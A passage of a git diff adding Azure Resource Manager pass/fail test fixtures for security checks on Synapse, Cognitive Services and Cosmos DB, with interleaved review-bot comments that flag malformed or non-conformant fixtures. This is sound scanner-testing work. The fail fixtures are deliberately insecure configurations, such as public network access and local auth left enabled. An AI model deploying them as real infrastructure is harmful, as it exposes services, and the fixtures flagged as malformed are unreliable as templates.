+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass2.json
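Review bot: Both `dependsOn` expressions in fail.json are malformed — `resourceId('Microsoft.Synapse/workspaces/firewallRules', 'test'))]` closes two parentheses for one opened — so the fixture is not a deployable template and only works if the check substring-matches on `firewallRules`. Use `"[resourceId('Microsoft.Synapse/workspaces/firewallRules', 'test')]"` and fix the `serverfarms` entry the same way, here and in pass.json. Detecting attached rules through `dependsOn` alone presumably misses a `firewallRules` child resource declared nested under the workspace or without a dependency; that limitation deserves a comment in the check or a fixture that documents it.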
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-02-01",
+ "name": "pass2",
+ "location": "East US",
+ "properties": {
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ }
+ }
+ ]
+}
+
diff --git a/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json
new file mode 100644
index 00000000000..4fbba1f7504
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json
@@ -0,0 +1,33 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "accounts_pike_name": {
+ "defaultValue": "pike",
+ "type": "String"
+ }
+ },
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.CognitiveServices/accounts",
+ "apiVersion": "2023-05-01",
+ "name": "fail",
+ "location": "westeurope",
+ "tags": {
+ "createby": "Terraform"
+ },
+ "sku": {
+ "name": "S0"
+ },
+ "kind": "Face",
+ "properties": {
+ "publicNetworkAccess": "Enabled",
+ "restrictOutboundNetworkAccess": false,
+ "allowedFqdnList": [],
+ "disableLocalAuth": false,
+ "dynamicThrottlingEnabled": false
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json
new file mode 100644
index 00000000000..90441225f09
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json
@@ -0,0 +1,36 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "apiVersion": "2023-05-01", + "name": "pass", + "location": "westeurope", + "tags": { + "createby": "Terraform" + }, + "sku": { + "name": "S0" + }, + "kind": "Face", + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "publicNetworkAccess": "Disabled", + "restrictOutboundNetworkAccess": false, + "allowedFqdnList": [], + "disableLocalAuth": false, + "dynamicThrottlingEnabled": false + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json new file mode 100644 index 00000000000..8f1a46d325f --- /dev/null +++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "name": "fail", + "location": "West US", + "sku": { + "name": "S0" + }, + "kind": "CognitiveServices", + "properties": { + "publicNetworkAccess": "Enabled", + "disableLocalAuth": false + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json new file mode 100644 index 00000000000..95abec6ec32 --- /dev/null +++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json 
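Review bot: CognitiveServicesConfigureIdentity/pass.json changes two things relative to fail.json on the previous line: it adds the `identity` block and also flips `publicNetworkAccess` from `Enabled` to `Disabled`, so the pair cannot show that the identity block is what the check reads. Keep `"publicNetworkAccess": "Enabled"` in pass.json so the only difference is `"identity": { "type": "SystemAssigned" }`.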
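Review bot: In CognitiveServicesEnableLocalAuth/fail.json the `Microsoft.CognitiveServices/accounts` resource has no `apiVersion`, which every ARM resource requires, and the `$schema` points at a `2023-05-01` deploymentTemplate schema version that I do not believe is published (every other fixture in this commit uses `2019-04-01`); should the parser or check key on `apiVersion`, this fixture exercises an error path rather than `disableLocalAuth`. Add `"apiVersion": "2023-05-01"` to the resource and use the `2019-04-01` `$schema`, here and in fail2.json and pass.json on the next line.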
@@ -0,0 +1,25 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "name": "fail2", + "location": "West US", + "sku": { + "name": "S0" + }, + "kind": "CognitiveServices", + "properties": { + "publicNetworkAccess": "Enabled" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json new file mode 100644 index 00000000000..90f828d966f --- /dev/null +++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "name": "pass", + "location": "West US", + "sku": { + "name": "S0" + }, + "kind": "CognitiveServices", + "properties": { + "publicNetworkAccess": "Enabled", + "disableLocalAuth": true + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail.json new file mode 100644 index 00000000000..41481242cbb --- /dev/null +++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail.json 
@@ -0,0 +1,48 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DocumentDB/databaseAccounts", + "apiVersion": "2024-05-15", + "name": "fail", + "location": "[resourceGroup().location]", + "kind": "GlobalDocumentDB", + "properties": { + "enableMultipleWriteLocations": true, + "capabilities": [ + { + "name": "EnableAggregationPipeline" + }, + { + "name": "mongoEnableDocLevelTTL" + }, + { + "name": "MongoDBv3.4" + } + ], + "consistencyPolicy": { + "defaultConsistencyLevel": "BoundedStaleness", + "maxIntervalInSeconds": 10, + "maxStalenessPrefix": 200 + }, + "databaseAccountOfferType": "Standard", + "enableAutomaticFailover": true, + "ipRangeFilter": [], + "isVirtualNetworkFilterEnabled": true, + "locations": [ + { + "locationName": "[variables('failoverLocation')]", + "failoverPriority": 1 + }, + { + "locationName": "[resourceGroup().location]", + "failoverPriority": 0 + } + ], + "networkAclBypass": "AzureServices", + "virtualNetworkRules": [] + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail2.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail2.json new file mode 100644 index 00000000000..62f8d8b9814 --- /dev/null +++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail2.json 
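Review bot: `"ipRangeFilter": []` is an array, but on the apiVersions that had that property it was a comma-separated string, and at the declared `2024-05-15` the IP allow-list is, as far as I recall, `ipRules` (a list of `{"ipAddressOrRange": ...}` objects); as written the fixture cannot exercise an IP-based restriction branch if the check has one. If the check only reads `isVirtualNetworkFilterEnabled` and `virtualNetworkRules`, drop the line; otherwise replace it with `"ipRules": []`. The same line appears in fail2.json and fail3.json on the following lines.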
@@ -0,0 +1,48 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2024-05-15",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "enableMultipleWriteLocations": true,
+ "capabilities": [
+ {
+ "name": "EnableAggregationPipeline"
+ },
+ {
+ "name": "mongoEnableDocLevelTTL"
+ },
+ {
+ "name": "MongoDBv3.4"
+ }
+ ],
+ "consistencyPolicy": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxIntervalInSeconds": 10,
+ "maxStalenessPrefix": 200
+ },
+ "databaseAccountOfferType": "Standard",
+ "enableAutomaticFailover": true,
+ "ipRangeFilter": [],
+ "isVirtualNetworkFilterEnabled": false,
+ "locations": [
+ {
+ "locationName": "[variables('failoverLocation')]",
+ "failoverPriority": 1
+ },
+ {
+ "locationName": "[resourceGroup().location]",
+ "failoverPriority": 0
+ }
+ ],
+ "networkAclBypass": "AzureServices",
+ "virtualNetworkRules": []
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail3.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail3.json
new file mode 100644
index 00000000000..0fc1f849ff6
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail3.json
@@ -0,0 +1,51 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2024-05-15",
+ "name": "fail3",
+ "location": "[resourceGroup().location]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "capabilities": [
+ {
+ "name": "EnableAggregationPipeline"
+ },
+ {
+ "name": "mongoEnableDocLevelTTL"
+ },
+ {
+ "name": "MongoDBv3.4"
+ }
+ ],
+ "consistencyPolicy": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxIntervalInSeconds": 10,
+ "maxStalenessPrefix": 200
+ },
+ "databaseAccountOfferType": "Standard",
+ "enableAutomaticFailover": true,
+ "ipRangeFilter": [],
+ "isVirtualNetworkFilterEnabled": false,
+ "locations": [
+ {
+ "locationName": "[variables('failoverLocation')]",
+ "failoverPriority": 1
+ },
+ {
+ "locationName": "[resourceGroup().location]",
+ "failoverPriority": 0
+ }
+ ],
+ "networkAclBypass": "AzureServices",
+ "virtualNetworkRules": [
+ {
+ "id": "Microsoft.virtualNetworks"
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail4.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail4.json
new file mode 100644
index 00000000000..af5317cc721
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail4.json
@@ -0,0 +1,96 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Network/azureFirewalls",
+ "apiVersion": "2020-05-01",
+ "name": "fail4",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "sku": {
+ "name": "AZFW_VNet",
+ "tier": "Standard"
+ },
+ "firewallPolicy": {
+ "id": "[resourceId('Microsoft.Network/firewallPolicies', 'example-policy')]"
+ }
+ }
+ },
+ {
+ "type": "Microsoft.Network/azureFirewalls/ruleCollections",
+ "apiVersion": "2020-05-01",
+ "name": "example/testcollection",
+ "properties": {
+ "priority": 100,
+ "action": {
+ "type": "Allow"
+ },
+ "rules": [
+ {
+ "name": "testrule",
+ "ruleType": "NetworkRule",
+ "sourceAddresses": [
+ "10.0.0.0/16"
+ ],
+ "destinationAddresses": [
+ "8.8.8.8",
+ "8.8.4.4"
+ ],
+ "destinationPorts": [
+ "53"
+ ],
+ "protocols": [
+ "TCP",
+ "UDP"
+ ]
+ }
+ ]
+ }
+ },
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2020-04-01",
+ "name": "fail4",
+ "location": "[resourceGroup().location]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "consistencyPolicy": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxIntervalInSeconds": 10,
+ "maxStalenessPrefix": 200
+ },
+ "locations": [
+ {
+ "locationName": "[parameters('failoverLocation')]",
+ "failoverPriority": 1
+ },
+ {
+ "locationName": "[resourceGroup().location]",
+ "failoverPriority": 0
+ }
+ ],
+ "enableAutomaticFailover": true,
+ "capabilities": [
+ {
+ "name": "EnableAggregationPipeline"
+ },
+ {
+ "name": "mongoEnableDocLevelTTL"
+ },
+ {
+ "name": "MongoDBv3.4"
+ }
+ ]
+ }
+ }
+ ],
+ "parameters": {
+ "randomInteger": {
+ "type": "int"
+ },
+ "failoverLocation": {
+ "type": "string"
+ }
+ }
+}
\ No newline at end of file
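Review bot: The two `Microsoft.Network/azureFirewalls*` resources have no bearing on a Cosmos DB network-restriction check and make it unclear which resource the expected failure belongs to; the same padding appears in pass2.json and pass4.json, and in pass2.json the rule-collection properties sit directly on the `azureFirewalls` resource. `Microsoft.Network/azureFirewalls/ruleCollections` also does not look like a type the ARM schema defines, so if the goal is to prove the check ignores unrelated resources, one minimal, valid unrelated resource would make that intent explicit. The `randomInteger` parameter is declared but never referenced.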
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass.json
new file mode 100644
index 00000000000..fe0dad4dac0
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass.json
@@ -0,0 +1,52 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2020-04-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "enableMultipleWriteLocations": false,
+ "consistencyPolicy": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxIntervalInSeconds": 10,
+ "maxStalenessPrefix": 200
+ },
+ "locations": [
+ {
+ "locationName": "[parameters('failoverLocation')]",
+ "failoverPriority": 1
+ },
+ {
+ "locationName": "[resourceGroup().location]",
+ "failoverPriority": 0
+ }
+ ],
+ "enableAutomaticFailover": true,
+ "capabilities": [
+ {
+ "name": "EnableAggregationPipeline"
+ },
+ {
+ "name": "mongoEnableDocLevelTTL"
+ },
+ {
+ "name": "MongoDBv3.4"
+ }
+ ],
+ "publicNetworkAccess": "Disabled"
+ }
+ }
+ ],
+ "parameters": {
+ "randomInteger": {
+ "type": "int"
+ },
+ "failoverLocation": {
+ "type": "string"
+ }
+ }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass2.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass2.json
new file mode 100644
index 00000000000..39ffa4134a8
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass2.json
@@ -0,0 +1,81 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Network/azureFirewalls",
+ "apiVersion": "2020-05-01",
+ "name": "pass2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "priority": 100,
+ "action": {
+ "type": "Allow"
+ },
+ "rules": [
+ {
+ "name": "testrule",
+ "ruleType": "NetworkRule",
+ "sourceAddresses": [
+ "10.0.0.0/16"
+ ],
+ "destinationAddresses": [
+ "8.8.8.8",
+ "8.8.4.4"
+ ],
+ "destinationPorts": [
+ "53"
+ ],
+ "protocols": [
+ "TCP",
+ "UDP"
+ ]
+ }
+ ]
+ }
+ },
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2020-04-01",
+ "name": "pass2",
+ "location": "[resourceGroup().location]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "consistencyPolicy": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxIntervalInSeconds": 10,
+ "maxStalenessPrefix": 200
+ },
+ "isVirtualNetworkFilterEnabled": true,
+ "locations": [
+ {
+ "locationName": "[parameters('failoverLocation')]",
+ "failoverPriority": 1
+ },
+ {
+ "locationName": "[resourceGroup().location]",
+ "failoverPriority": 0
+ }
+ ],
+ "enableAutomaticFailover": true,
+ "capabilities": [
+ {
+ "name": "EnableAggregationPipeline"
+ },
+ {
+ "name": "mongoEnableDocLevelTTL"
+ },
+ {
+ "name": "MongoDBv3.4"
+ }
+ ],
+ "virtualNetworkRules": [
+ {
+ "id": "Microsoft.virtualNetworks",
+ "ignoreMissingVNetServiceEndpoint": true
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass3.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass3.json
new file mode 100644
index 00000000000..7b5dc7e7b3f
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass3.json
@@ -0,0 +1,54 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2024-05-15",
+ "name": "pass3",
+ "location": "[resourceGroup().location]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "capabilities": [
+ {
+ "name": "EnableAggregationPipeline"
+ },
+ {
+ "name": "mongoEnableDocLevelTTL"
+ },
+ {
+ "name": "MongoDBv3.4"
+ }
+ ],
+ "consistencyPolicy": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxIntervalInSeconds": 10,
+ "maxStalenessPrefix": 200
+ },
+ "databaseAccountOfferType": "Standard",
+ "enableAutomaticFailover": true,
+ "ipRangeFilter": [],
+ "isVirtualNetworkFilterEnabled": true,
+ "ipRules": [
+ "192.0.0.1"
+ ],
+ "locations": [
+ {
+ "locationName": "[variables('failoverLocation')]",
+ "failoverPriority": 1
+ },
+ {
+ "locationName": "[resourceGroup().location]",
+ "failoverPriority": 0
+ }
+ ],
+ "networkAclBypass": "AzureServices",
+ "virtualNetworkRules": [
+ {
+ "id": "Microsoft.virtualNetworks"
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass4.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass4.json
new file mode 100644
index 00000000000..c68f1383fa6
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass4.json
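Review bot: `ipRules` here is a list of bare strings (`"192.0.0.1"`), whereas pass4.json uses the `{ "ipAddressOrRange": "..." }` object form that the `databaseAccounts` schema defines for this property; if both fixtures are expected to pass, the check is presumably only testing that the list is non-empty, so a malformed list that Azure would reject at deployment counts as restricted access. Make pass3 schema-conformant, and if tolerating the string form is intentional, state that in the check rather than leaving it implied by a fixture. Note also that `isVirtualNetworkFilterEnabled: true` plus a `virtualNetworkRules` entry already satisfies pass2.json, so it is not clear which of the two conditions this fixture is meant to exercise.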
@@ -0,0 +1,107 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Network/azureFirewalls",
+ "apiVersion": "2020-05-01",
+ "name": "pass4",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "sku": {
+ "name": "AZFW_VNet",
+ "tier": "Standard"
+ },
+ "firewallPolicy": {
+ "id": "[resourceId('Microsoft.Network/firewallPolicies', 'example-policy')]"
+ }
+ }
+ },
+ {
+ "type": "Microsoft.Network/azureFirewalls/ruleCollections",
+ "apiVersion": "2020-05-01",
+ "name": "pass4",
+ "properties": {
+ "priority": 100,
+ "action": {
+ "type": "Allow"
+ },
+ "rules": [
+ {
+ "name": "testrule",
+ "ruleType": "NetworkRule",
+ "sourceAddresses": [
+ "10.0.0.0/16"
+ ],
+ "destinationAddresses": [
+ "8.8.8.8",
+ "8.8.4.4"
+ ],
+ "destinationPorts": [
+ "53"
+ ],
+ "protocols": [
+ "TCP",
+ "UDP"
+ ]
+ }
+ ]
+ }
+ },
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2020-04-01",
+ "name": "pass4",
+ "location": "[resourceGroup().location]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "consistencyPolicy": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxIntervalInSeconds": 10,
+ "maxStalenessPrefix": 200
+ },
+ "locations": [
+ {
+ "locationName": "[parameters('failoverLocation')]",
+ "failoverPriority": 1
+ },
+ {
+ "locationName": "[resourceGroup().location]",
+ "failoverPriority": 0
+ }
+ ],
+ "enableAutomaticFailover": true,
+ "capabilities": [
+ {
+ "name": "EnableAggregationPipeline"
+ },
+ {
+ "name": "mongoEnableDocLevelTTL"
+ },
+ {
+ "name": "MongoDBv3.4"
+ }
+ ],
+ "virtualNetworkRules": [
+ {
+ "id": "[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Network/virtualNetworks/example/subnets/default')]"
+ }
+ ],
+ "ipRules": [
+ {
+ "ipAddressOrRange": "192.0.0.1"
+ }
+ ],
+ "isVirtualNetworkFilterEnabled": true
+ }
+ }
+ ],
+ 
"parameters": {
+ "randomInteger": {
+ "type": "int"
+ },
+ "failoverLocation": {
+ "type": "string"
+ }
+ }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail.json b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail.json
new file mode 100644
index 00000000000..71f760b762e
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail.json
@@ -0,0 +1,105 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "metadata": {
+ "_generator": {
+ "name": "bicep",
+ "version": "0.12.40.16777",
+ "templateHash": "13150321745581597627"
+ }
+ },
+ "parameters": {
+ "accountName": {
+ "type": "string",
+ "defaultValue": "[format('sql-{0}', toLower(uniqueString(resourceGroup().id)))]",
+ "metadata": {
+ "description": "Cosmos DB account name, max length 44 characters"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for the Cosmos DB account."
+ }
+ },
+ "defaultConsistencyLevel": {
+ "type": "string",
+ "defaultValue": "Session",
+ "metadata": {
+ "description": "The default consistency level of the Cosmos DB account."
+ },
+ "allowedValues": [
+ "Eventual",
+ "ConsistentPrefix",
+ "Session",
+ "BoundedStaleness",
+ "Strong"
+ ]
+ },
+ "maxStalenessPrefix": {
+ "type": "int",
+ "defaultValue": 100000,
+ "metadata": {
+ "description": "Max stale requests. Required for BoundedStaleness. Valid ranges, Single Region: 10 to 2147483647. Multi Region: 100000 to 2147483647."
+ },
+ "maxValue": 2147483647,
+ "minValue": 10
+ },
+ "maxIntervalInSeconds": {
+ "type": "int",
+ "defaultValue": 300,
+ "metadata": {
+ "description": "Max lag time (minutes). Required for BoundedStaleness. Valid ranges, Single Region: 5 to 84600. Multi Region: 300 to 86400."
+ },
+ "maxValue": 86400,
+ "minValue": 5
+ }
+ },
+ "variables": {
+ "consistencyPolicy": {
+ "Eventual": {
+ "defaultConsistencyLevel": "Eventual"
+ },
+ "ConsistentPrefix": {
+ "defaultConsistencyLevel": "ConsistentPrefix"
+ },
+ "Session": {
+ "defaultConsistencyLevel": "Session"
+ },
+ "BoundedStaleness": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxStalenessPrefix": "[parameters('maxStalenessPrefix')]",
+ "maxIntervalInSeconds": "[parameters('maxIntervalInSeconds')]"
+ },
+ "Strong": {
+ "defaultConsistencyLevel": "Strong"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2022-05-15",
+ "name": "fail",
+ "location": "[parameters('location')]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "databaseAccountOfferType": "Standard",
+ "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+ "locations": [
+ {
+ "locationName": "[parameters('location')]",
+ "failoverPriority": 0,
+ "isZoneRedundant": false
+ }
+ ],
+ "capabilities": [
+ {
+ "name": "EnableServerless"
+ }
+ ]
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail1.json b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail1.json
new file mode 100644
index 00000000000..e1476145487
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail1.json
@@ -0,0 +1,106 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "metadata": {
+ "_generator": {
+ "name": "bicep",
+ "version": "0.12.40.16777",
+ "templateHash": "13150321745581597627"
+ }
+ },
+ "parameters": {
+ "accountName": {
+ "type": "string",
+ "defaultValue": "[format('sql-{0}', toLower(uniqueString(resourceGroup().id)))]",
+ "metadata": {
+ "description": "Cosmos DB account name, max length 44 characters"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for the Cosmos DB account."
+ }
+ },
+ "defaultConsistencyLevel": {
+ "type": "string",
+ "defaultValue": "Session",
+ "metadata": {
+ "description": "The default consistency level of the Cosmos DB account."
+ },
+ "allowedValues": [
+ "Eventual",
+ "ConsistentPrefix",
+ "Session",
+ "BoundedStaleness",
+ "Strong"
+ ]
+ },
+ "maxStalenessPrefix": {
+ "type": "int",
+ "defaultValue": 100000,
+ "metadata": {
+ "description": "Max stale requests. Required for BoundedStaleness. Valid ranges, Single Region: 10 to 2147483647. Multi Region: 100000 to 2147483647."
+ },
+ "maxValue": 2147483647,
+ "minValue": 10
+ },
+ "maxIntervalInSeconds": {
+ "type": "int",
+ "defaultValue": 300,
+ "metadata": {
+ "description": "Max lag time (minutes). Required for BoundedStaleness. Valid ranges, Single Region: 5 to 84600. Multi Region: 300 to 86400."
+ },
+ "maxValue": 86400,
+ "minValue": 5
+ }
+ },
+ "variables": {
+ "consistencyPolicy": {
+ "Eventual": {
+ "defaultConsistencyLevel": "Eventual"
+ },
+ "ConsistentPrefix": {
+ "defaultConsistencyLevel": "ConsistentPrefix"
+ },
+ "Session": {
+ "defaultConsistencyLevel": "Session"
+ },
+ "BoundedStaleness": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxStalenessPrefix": "[parameters('maxStalenessPrefix')]",
+ "maxIntervalInSeconds": "[parameters('maxIntervalInSeconds')]"
+ },
+ "Strong": {
+ "defaultConsistencyLevel": "Strong"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2022-05-15",
+ "name": "fail1",
+ "location": "[parameters('location')]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "disableLocalAuth": false,
+ "databaseAccountOfferType": "Standard",
+ "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+ "locations": [
+ {
+ "locationName": "[parameters('location')]",
+ "failoverPriority": 0,
+ "isZoneRedundant": false
+ }
+ ],
+ "capabilities": [
+ {
+ "name": "EnableServerless"
+ }
+ ]
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/pass.json b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/pass.json
new file mode 100644
index 00000000000..1e0ca9c5134
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/pass.json
@@ -0,0 +1,106 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "metadata": {
+ "_generator": {
+ "name": "bicep",
+ "version": "0.12.40.16777",
+ "templateHash": "13150321745581597627"
+ }
+ },
+ "parameters": {
+ "accountName": {
+ "type": "string",
+ "defaultValue": "[format('sql-{0}', toLower(uniqueString(resourceGroup().id)))]",
+ "metadata": {
+ "description": "Cosmos DB account name, max length 44 characters"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
